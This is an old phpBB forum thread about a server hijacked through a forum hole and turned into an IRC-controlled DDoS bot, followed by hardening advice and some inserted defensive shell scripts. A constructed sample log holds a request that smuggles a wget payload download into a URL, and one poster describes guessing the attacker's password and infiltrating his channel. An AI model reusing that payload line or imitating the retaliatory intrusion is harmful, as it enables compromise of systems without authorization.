Forum Hack Story

The 2.0.x discussion forum has been locked; this will remain read-only. The 3.0.x discussion forum has been renamed phpBB Discussion.
SQLBoy
Registered User
Posts: 5
Joined: Mon Dec 06, 2004 2:29 am

Forum Hack Story

Post by SQLBoy »

So, recently I was away on a weekend trip to NY and when I came back, a customer of mine had his machine hacked into through phpBB.

The guy uploads a perl script which is an IRC bot script and it connects to a channel under the cracker's control. From that point, he can execute arbitrary shell commands through a private conversation with the bot. The perl script disguises itself as an apache process. I actually learned a good amount of technique from this guy's perl code.

Unfortunately, I didn't have a decent outbound firewall on the machine and the script was able to get out, nor did I have any intrusion detection software running.

I connected to the channel the bot connects to with XChat and the guy had like 100 Linux zombies in there, all of them he got through the phpBB hack. I talked to him for a while using babelfish because he doesn't speak English. He was using them for massive DDOS attacks. I whoised them all and got the IP addresses and emailed their ISP or hosting provider. So far I only got two responses and the list of zombies entering the channel is getting ridiculous. The guy booted me and passworded it, but I did some research on him and I was able to guess his password (1st try).

Anyway, I have always considered phpBB to be the biggest weak link on any web server. Even if you keep your PHP and Apache versions totally up to date, something like this could always happen. So, my advice to anyone running phpBB, to get a little added protection:

Add the LIDS kernel patches
http://www.lids.org/

Use a stateful outbound firewall that doesn't allow programs to initiate a connection from the machine. For example:

iptables -P OUTPUT DROP   # default-deny policy; the ACCEPT rule below does nothing on its own
iptables -A OUTPUT -o eth0 -p all -m state --state ESTABLISHED,RELATED -j ACCEPT   # OUTPUT matches the outgoing interface with -o, not -i
Will only allow packets that are part of an existing/established TCP session to leave your box. Then you can poke small holes in to allow mail transport, DNS, etc.

If anyone else has any added tips that would have rendered the hole in PHPBB useless to a cracker, please post them.
Magnotta
Former Team Member
Posts: 1093
Joined: Fri Oct 17, 2003 4:16 am
Location: Ontario

Post by Magnotta »

The best thing to do with phpBB as far as security goes is always keep up to date and use the newest version.
sonyboy
Registered User
Posts: 2980
Joined: Thu Oct 07, 2004 2:10 am

Post by sonyboy »

interesting story
Locksmiff
Registered User
Posts: 104
Joined: Sat Nov 20, 2004 5:51 am

Re: Forum Hack Story

Post by Locksmiff »

SQLBoy wrote: If anyone else has any added tips that would have rendered the hole in PHPBB useless to a cracker, please post them.
I have a shit load. They are easier to implement than explain, so leave it with me and I will do a draft up. Too many cooks spoil the broth is one.
The internet is in the hands of idiots......
Locksmiff
Registered User
Posts: 104
Joined: Sat Nov 20, 2004 5:51 am

Post by Locksmiff »

Magnotta wrote: The best thing to do with phpBB as far as security goes is always keep up to date and use the newest version.
Yeah, ok, how does that work pre-2.11? :lol: Just joking, of course.
The internet is in the hands of idiots......
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

1. Keep phpBB up-to-date.
2. You can make use of mod_security.
3. You can make use of IDS'es and IPS'es on your network and on your server.
4. Make sure appropriate rights are assigned to the appropriate people.
5. Harden your filesystem, whatever OS you are using.
6. Keep phpBB up-to-date.
7. Keep everything on your server up-to-date.
8. Regularly scan your server for running backdoors and such.
9. Actively monitor your site.
10. Harden your OS, whatever OS you are using.

Just a small list. And yes, I know I said keep phpBB up-to-date more than once. However, I cannot stress this enough. People with MODs, update to 2.0.11 anyway. You can always reinstall them.
Proven Offensive Security Expertise. OSCP - GXPN
bzchi
Registered User
Posts: 8
Joined: Sun Oct 31, 2004 3:11 am
Location: Australia

Post by bzchi »

Because this isn't a backdoor as such, you will no doubt get negative responses from scanners but still have code sitting in /tmp.

What _can_ be done
Obviously upgrade to the latest version, but for exploits of this nature you can follow several steps to secure the area that the scripts/exploits target.

The critical thing to do to avoid this exploit causing any problems to your system is to secure /tmp, /usr/tmp. Make sure /tmp is mounted with noexec, nosuid so even if people manage to exploit phpBB (or another script for that matter) and upload files, they won't be able to execute them. To confirm you have /tmp mounted with noexec,nosuid type 'mount' and it will be listed to the right of the mounted partition.

Another thing to make note of (the iptables rule in the original post): even if you set OUTPUT rules on your firewall, there are many services that still need to initiate connections and get out. For example RHN uses ports 80 and 443 to access updates (up2date etc). cPanel, WHM, Plesk etc all use updates off the net. You do require some output rules so local services can get out, but it is best to keep these to a restricted list of known hosts (RHN mirrors etc). This also applies to other package managers such as APT in Debian. So although it looks 'ultra secure' setting only established and related packets back out, you may run yourself into a bigger problem with scheduled security updates failing because they can't contact update servers. Just be careful.

mod_security would be good, and restrict the use of wget being passed in the URL (this will stop a fair amount of attempts). This is made redundant by securing /tmp but it is an extra layer.

I monitor this forum daily for updates and one of my dev boxes was still hit before I managed to update (a matter of hours after 2.0.11 was out). I believe word of this exploit was about for a fair time before phpBB broke news of it, but the response from phpBB once informed was highly commendable.


For the original poster:
Was the server Undernet and the channel something to do with FBI? I have heard 3 or 4 stories in the last 24 hours of people being hit with what you describe. All a result of a stale install of phpBB. Looks like a group is basically scanning hosts for old versions of phpBB.
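Putting SQLBoy's OUTPUT rule and bzchi's caveat about update servers together, as an added example that is not code from either post: a default-deny OUTPUT chain that keeps holes only for named resolvers, one mail relay and allow-listed update mirrors, so scheduled updates keep working while a freshly dropped bot cannot reach its IRC server. The interface name, the TEST-NET placeholder addresses and the allows_new_to helper are assumptions for illustration; replace the addresses with your own.

```shell
#!/bin/sh
# Added example (not from the thread): default-deny OUTPUT chain with
# pinned holes for DNS, mail and package updates.  Prints the iptables
# commands by default; run as root with IPT=iptables to apply them.
# All addresses are placeholders from the documentation (TEST-NET) ranges.

IFACE="${IFACE:-eth0}"                                        # outside interface (assumed)
RESOLVERS="${RESOLVERS:-192.0.2.53}"                          # DNS servers this host may query
MAIL_RELAY="${MAIL_RELAY:-192.0.2.25}"                        # smart host for outbound mail
UPDATE_HOSTS="${UPDATE_HOSTS:-198.51.100.10 198.51.100.11}"   # RHN/APT mirrors, cPanel, etc.
IPT="${IPT:-echo iptables}"                                   # dry run unless overridden

outbound_rules() {
    $IPT -F OUTPUT
    $IPT -A OUTPUT -o lo -j ACCEPT
    # The rule from the original post, corrected: the OUTPUT chain has no
    # input interface, so the match is -o, not -i.  It passes replies on
    # connections the server already accepted (HTTP, SSH, ...).
    $IPT -A OUTPUT -o "$IFACE" -m state --state ESTABLISHED,RELATED -j ACCEPT
    # Holes for NEW connections, each pinned to a known destination so a
    # compromised web process cannot reuse them to reach an arbitrary host.
    for r in $RESOLVERS; do
        $IPT -A OUTPUT -o "$IFACE" -p udp -d "$r" --dport 53 -m state --state NEW -j ACCEPT
        $IPT -A OUTPUT -o "$IFACE" -p tcp -d "$r" --dport 53 -m state --state NEW -j ACCEPT
    done
    $IPT -A OUTPUT -o "$IFACE" -p tcp -d "$MAIL_RELAY" --dport 25 -m state --state NEW -j ACCEPT
    for h in $UPDATE_HOSTS; do
        $IPT -A OUTPUT -o "$IFACE" -p tcp -d "$h" -m multiport --dports 80,443 -m state --state NEW -j ACCEPT
    done
    # Log (rate-limited) whatever is about to be refused: an IRC bot trying
    # to reach its channel shows up here before anything else does.
    $IPT -A OUTPUT -o "$IFACE" -m state --state NEW -m limit --limit 5/min -j LOG --log-prefix "OUTPUT-DENIED: "
    # Policy last, so an admin applying this over SSH is never cut off
    # between the flush and the ESTABLISHED rule.
    $IPT -P OUTPUT DROP
}

# allows_new_to HOST PORT -> 0 if some explicit ACCEPT rule above lets a NEW
# TCP/UDP connection reach HOST:PORT.  Reads the dry-run output, so it never
# touches the live tables; use it to sanity-check the policy before applying.
allows_new_to() {
    ( IPT="echo iptables"; outbound_rules ) | grep -- '--state NEW -j ACCEPT' |
    awk -v host="$1" -v port="$2" '
        { dst = ""; ports = ""
          for (i = 1; i <= NF; i++) {
              if ($i == "-d") dst = $(i + 1)
              if ($i == "--dport" || $i == "--dports") ports = $(i + 1)
          }
          n = split(ports, p, ",")
          for (j = 1; j <= n; j++) if (dst == host && p[j] == port) found = 1
        }
        END { exit(found ? 0 : 1) }'
}

case "${1:-}" in
    apply) IPT=iptables; outbound_rules ;;
    print) outbound_rules ;;
esac
```

Run it with print to review the commands, or as root with IPT=iptables and apply. Before applying, allows_new_to 198.51.100.10 443 should succeed and allows_new_to with any host and port 6667 should fail. This is containment only: the exploiting request still arrives on port 80, a bot already running keeps running (its failed connection attempts appear as OUTPUT-DENIED log lines), and a recursive resolver remains a path out over DNS, so keep the allow list short and read the log.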
SQLBoy
Registered User
Posts: 5
Joined: Mon Dec 06, 2004 2:29 am

Post by SQLBoy »

No, it is another IRC server. I don't want to post the details on here because I have modified their perl script to monitor the channel for me. It still responds to most of the bot commands they have, so they have not caught on that I'm actually an intruder. When I have time, I get all the IP addresses of the other bots and start doing whois's and stuff, emailing the people I think might be in charge of the machine. The list is growing massive though. When these guys level a DDOS on someone it's over 100 Mbps of traffic.

Mounting /tmp noexec is great. I didn't know you could do that. Gentoo users should also note that /var/tmp and /dev/shm have the same permissions as /tmp and are also vulnerable.
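A check for the /tmp, /var/tmp and /dev/shm advice above, as an added example rather than anything posted in the thread: it parses /proc/mounts and reports each scratch location that is not a separate mount carrying both noexec and nosuid. The sample mount table is constructed. One caveat the posts do not spell out: noexec stops the kernel executing a file from that filesystem directly, so ./bot and a chmod +x script stop working, but an interpreter started explicitly (perl /tmp/bot.pl, sh /tmp/x.sh) still reads and runs the file, which is exactly how the perl bot in the story would be started. Treat noexec as one layer, not the fix.

```shell
#!/bin/sh
# Added example (not from the thread): audit the world-writable scratch
# mounts an attacker drops files into (/tmp, /var/tmp, /dev/shm) for the
# noexec and nosuid options, reading /proc/mounts format.  The sample
# mount table below is constructed for the example, not taken from a
# real host.

# mount_opts MOUNTPOINT [FILE] -> option list of the last entry for that
# mount point (a later mount shadows an earlier one), empty if the path
# is not its own mount.
mount_opts() {
    awk -v mp="$1" '$2 == mp { opts = $4 } END { print opts }' "${2:-/proc/mounts}"
}

# has_opt OPTLIST OPT -> 0 if OPT appears in the comma-separated list
has_opt() {
    case ",$1," in
        *",$2,"*) return 0 ;;
        *)        return 1 ;;
    esac
}

# check_mount MOUNTPOINT [FILE] -> 0 only if the path is a separate mount
# carrying both noexec and nosuid; otherwise prints why it fails.
check_mount() {
    opts=$(mount_opts "$1" "${2:-/proc/mounts}")
    if [ -z "$opts" ]; then
        echo "$1: not a separate mount, inherits exec rights from its parent"
        return 1
    fi
    missing=""
    for o in noexec nosuid; do
        has_opt "$opts" "$o" || missing="$missing $o"
    done
    if [ -n "$missing" ]; then
        echo "$1: mounted with '$opts', missing:$missing (fix: mount -o remount,noexec,nosuid $1)"
        return 1
    fi
    echo "$1: ok ($opts)"
}

# audit [FILE] -> 0 if every scratch mount passes
audit() {
    rc=0
    for mp in /tmp /var/tmp /dev/shm; do
        check_mount "$mp" "${1:-/proc/mounts}" || rc=1
    done
    return $rc
}

# Constructed sample: /tmp is hardened, /dev/shm is not, and /var/tmp is
# just a directory on the root filesystem (the Gentoo case above).
SAMPLE_MOUNTS=$(mktemp)
trap 'rm -f "$SAMPLE_MOUNTS"' EXIT
cat > "$SAMPLE_MOUNTS" <<'EOF'
/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,noexec,nosuid,nodev 0 0
tmpfs /dev/shm tmpfs rw 0 0
proc /proc proc rw 0 0
EOF

case "${1:-}" in
    sample) audit "$SAMPLE_MOUNTS" ;;
    live)   audit ;;
esac
```

sh tmpaudit.sh sample shows the three verdicts for the constructed table; sh tmpaudit.sh live runs it against the real /proc/mounts. A path that is only a directory on the root filesystem cannot carry its own options, so the fix there is a separate filesystem (or a small tmpfs) with noexec,nosuid,nodev in fstab, not a remount.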
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

Techie-Micheal wrote: 1. Keep phpBB up-to-date.
2. You can make use of mod_security.
3. You can make use of IDS'es and IPS'es on your network and on your server.
4. Make sure appropriate rights are assigned to the appropriate people.
5. Harden your filesystem, whatever OS you are using.
6. Keep phpBB up-to-date.
7. Keep everything on your server up-to-date.
8. Regularly scan your server for running backdoors and such.
9. Actively monitor your site.
10. Harden your OS, whatever OS you are using.

Just a small list. And yes, I know I said keep phpBB up-to-date more than once. However, I cannot stress this enough. People with MODs, update to 2.0.11 anyway. You can always reinstall them.
/me whistles non-chalantly ...
Proven Offensive Security Expertise. OSCP - GXPN
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

bzchi wrote: Because this isn't a backdoor as such, you will no doubt get negative responses from scanners but still have code sitting in /tmp.
The one backdoor that I saw in /tmp from a user was listening on a TCP port, so yeah, a scan would have picked it up. ;)
Proven Offensive Security Expertise. OSCP - GXPN
bzchi
Registered User
Posts: 8
Joined: Sun Oct 31, 2004 3:11 am
Location: Australia

Post by bzchi »

Techie-Micheal wrote:
bzchi wrote: Because this isn't a backdoor as such, you will no doubt get negative responses from scanners but still have code sitting in /tmp.
The one backdoor that I saw in /tmp from a user was listening on a TCP port, so yeah, a scan would have picked it up. ;)


I respect your position as a moderator but I believe this post was added purely to attempt to discredit my claims that some attacks may go unnoticed by IDS on the grounds that you have seen a single incident that was detectable?

I think this can be potentially misleading; in the instance you speak about maybe they were lucky that a port was opened? Instances still occur where some IDSs don't pick this kind of attack/intrusion up. Not all people install a backdoor/trojan when exploiting this hole. In fact, I have cleaned up a server that just uploaded multiple instances of sh to execute commands one by one, no running services, and local scanning didn't pick it up. On top of that, different people run different IDSs and not all of them are as infallible as you suggest yours is.
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

bzchi wrote:
Techie-Micheal wrote:
bzchi wrote: Because this isn't a backdoor as such, you will no doubt get negative responses from scanners but still have code sitting in /tmp.
The one backdoor that I saw in /tmp from a user was listening on a TCP port, so yeah, a scan would have picked it up. ;)


Well thats good for him,
I guess I deserved that one. :P
instances still occur where some IDS's don't pick this kind of attack/intrusion up.
I know this ... However, IDS'es shouldn't be the only thing in your toolbelt, which is what I was getting at.
Not all people install a backdoor/trojan when exploiting this hole. Infact I have cleaned up a server than just uploaded multiple instances of SH to execute commands one by one, no running services and local scanning didn't pick it up.
I know this too ... However, it should be a simple rule to write to detect the exploit. Heck, I've even put a change in my phpBB to give attackers a nasty little message when they try to exploit the hole.
It's all well and good to post up 'best practice' or 'do this do that' but it really isn't helping those affected which I think this thread should aim at..
Same goes for your own post. ;)
may I also point out that your first step 'keep phpBB up to date' would not have necessarily helped in this instance as the exploit was out and servers were being affected before the update was released.
That is true, and why I hate 0day, but 99% of the time, and in fact I'd even wager almost 100% of those attacked would have been safe if they just updated to 2.0.11.
Now suggesting a better IDS etc, thats great.. I can chant about server security all day too.. but I think helping people with advice is of more benefit than surveying the scene with 20/20.
Not just better IDSes, but better handling. Making sure you are up-to-date on your software, not just in terms of running the patches, but making sure you understand what it is you are running. And if people don't have access to properly protect their server (I'm guessing the majority of our users are free/shared hosting users), they need to contact their webhost to make sure the proper measures are in place. Proper measures are not just monitoring your IDS, but making sure your host and you understand what it is that happened, be it a defacement, a virus went crazy on the server, or a hard drive failed.
Proven Offensive Security Expertise. OSCP - GXPN
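As an added example, not the thread's own rule or any mod_security configuration: the wget-in-URL pattern bzchi suggests refusing with mod_security, applied after the fact to an Apache access log, which is the kind of simple detection rule mentioned above. It decodes percent-encoding and folds case before matching, so %77get or WGET is caught as well, and curl is added to the match on the same reasoning. The log lines and addresses are constructed.

```shell
#!/bin/sh
# Added example (not from the thread): find access-log requests that carry
# a download command (wget, curl) inside the URL.  mod_security can reject
# such requests inline; this finds attempts already sitting in an Apache
# access log, decoding %XX escapes first so an encoded "wget" is not
# missed.  The log lines below are constructed, not captured traffic.

# url_decode: stdin -> stdout, expanding %XX escapes and '+'.  POSIX awk
# has no hex conversion, so a lookup table is built up front.
url_decode() {
    awk 'BEGIN {
            for (i = 1; i < 256; i++) {
                h = sprintf("%02x", i)
                tab[h] = sprintf("%c", i); tab[toupper(h)] = tab[h]
            }
         }
         {
            s = $0; out = ""
            while ((p = index(s, "%")) > 0) {
                out = out substr(s, 1, p - 1)
                hex = substr(s, p + 1, 2)
                if (hex in tab) { out = out tab[hex]; s = substr(s, p + 3) }
                else            { out = out "%";      s = substr(s, p + 1) }
            }
            s = out s
            gsub(/\+/, " ", s)
            print s
         }'
}

# flag_requests: read combined-format log lines on stdin and echo the ones
# whose request line, decoded and lower-cased, names a downloader.
flag_requests() {
    while IFS= read -r line; do
        req=$(printf '%s\n' "$line" | awk -F'"' '{ print $2 }' | url_decode | tr 'A-Z' 'a-z')
        case "$req" in
            *wget*|*curl*) printf '%s\n' "$line" ;;
        esac
    done
}

# count_flagged: stdin -> number of flagged lines (handy for alert thresholds)
count_flagged() {
    flag_requests | wc -l | tr -d ' '
}

# Constructed sample log, documentation addresses only: two benign hits, one
# plain "wget" in a query string, one with the same thing percent-encoded
# and upper-cased.
SAMPLE_LOG='203.0.113.7 - - [06/Dec/2004:02:29:11 +0000] "GET /forum/index.php HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
203.0.113.8 - - [06/Dec/2004:02:31:40 +0000] "GET /forum/index.php?q=x;wget%20http://198.51.100.9/bot.pl HTTP/1.0" 200 240 "-" "lwp-trivial/1.41"
203.0.113.9 - - [06/Dec/2004:02:32:02 +0000] "GET /forum/index.php?q=x%3B%57%47%45%54%20http%3A%2F%2F198.51.100.9%2Fbot.pl HTTP/1.0" 200 240 "-" "lwp-trivial/1.41"
203.0.113.10 - - [06/Dec/2004:02:33:15 +0000] "GET /forum/faq.php HTTP/1.0" 200 8800 "-" "Mozilla/4.0"'

case "${1:-}" in
    sample) printf '%s\n' "$SAMPLE_LOG" | flag_requests ;;
    "")     ;;
    *)      flag_requests < "$1" ;;
esac
```

sh findfetch.sh sample prints the two hits; sh findfetch.sh /var/log/httpd/access_log runs it over a real log. Matching on the downloader name is the cheap check: it misses a payload carried in a POST body or a fetcher not on the list, which is why this is an extra layer behind a noexec /tmp rather than the fix.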
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

bzchi wrote:
Techie-Micheal wrote:
bzchi wrote: Because this isn't a backdoor as such, you will no doubt get negative responses from scanners but still have code sitting in /tmp.
The one backdoor that I saw in /tmp from a user was listening on a TCP port, so yeah, a scan would have picked it up. ;)


I respect your position as a moderator but I believe this post was added purely to attempt to discredit my claims that some attacks may go unnoticed by IDS on the grounds that you have seen a single incident that was detectable?

I think this can be potentially misleading; in the instance you speak about maybe they were lucky that a port was opened? Instances still occur where some IDSs don't pick this kind of attack/intrusion up. Not all people install a backdoor/trojan when exploiting this hole. In fact, I have cleaned up a server that just uploaded multiple instances of sh to execute commands one by one, no running services, and local scanning didn't pick it up. On top of that, different people run different IDSs and not all of them are as infallible as you suggest yours is.
I really do not appreciate your editing your post. Especially in such an attacking manner ... Read my post above, it explains all ... Now, you can either chill out, and we can carry on this conversation like two grown adults, or I can get out my big stick. Your choice.
Proven Offensive Security Expertise. OSCP - GXPN
Draegonis
Former Team Member
Posts: 3950
Joined: Mon Apr 22, 2002 3:12 pm
Location: Kµlt øƒ Ø

Post by Draegonis »

Oofay, nice ninja edit. Shame you changed it to effective slander. You've made 3 posts here and you're already challenging the staff. Tone it down a bit, eh?
bzchi
Registered User
Posts: 8
Joined: Sun Oct 31, 2004 3:11 am
Location: Australia

Post by bzchi »

My apologies for the post, I attempted to remove it but unfortunately it had already been responded to.

I didn't want a personal attack, but I believe it is easy to take the high ground and I just want to get across that if someone has an IDS it doesn't make them safe.

That's all I want to get across. I'm not attempting to upset anyone or put them offside, nor was it a 'ninja post'. I believe your points are more than valid, Techie-Micheal, I just think they can be read as "if you have this, you are safe".